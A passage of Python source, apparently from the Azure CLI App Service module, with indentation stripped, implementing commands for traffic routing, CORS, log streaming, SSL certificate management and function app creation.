RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = get_pool_manager(url)
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
logger.warning(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace')
.rstrip('\n\r')) # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
# If in the public cloud, check if certificate is an app service certificate, in the same or a diferent
# subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cmd.cli_ctx)
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
kv_secret_name = None
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
# if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except Exception as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
found_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
# delimiters allowed: '|', ':'
if '|' in runtime:
runtime = re.split('[|]', runtime)
elif ':' in runtime:
runtime = re.split('[:]', runtime)
else:
runtime = [runtime]
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack['configs'].items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
for r in result:
r['setter'] = _StackRuntimeHelper.update_site_config
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku, number_of_workers=None,
max_burst=None, location=None, tags=None, zone_redundant=False):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def create_functionapp(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 3. In the future, specifying a version will "
"be required. To create a 3.x function you would pass in the flag `--functions-version 3`")
functions_version = '3'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
from azure.mgmt.web.models import Site
SiteConfig, NameValuePair = cmd.get_models('SiteConfig', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
client = web_client_factory(cmd.cli_ctx)
if vnet or subnet:
if plan:
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
webapp_location = plan_info.location
else:
webapp_location = consumption_plan_location
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=webapp_location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
functionapp_def = Site(location=None, site_config=site_config, tags=tags,
virtual_network_subnet_id=subnet_resource_id)
KEYS = FUNCTIONS_STACKS_API_KEYS()
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or consumption, we need these app settings
if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
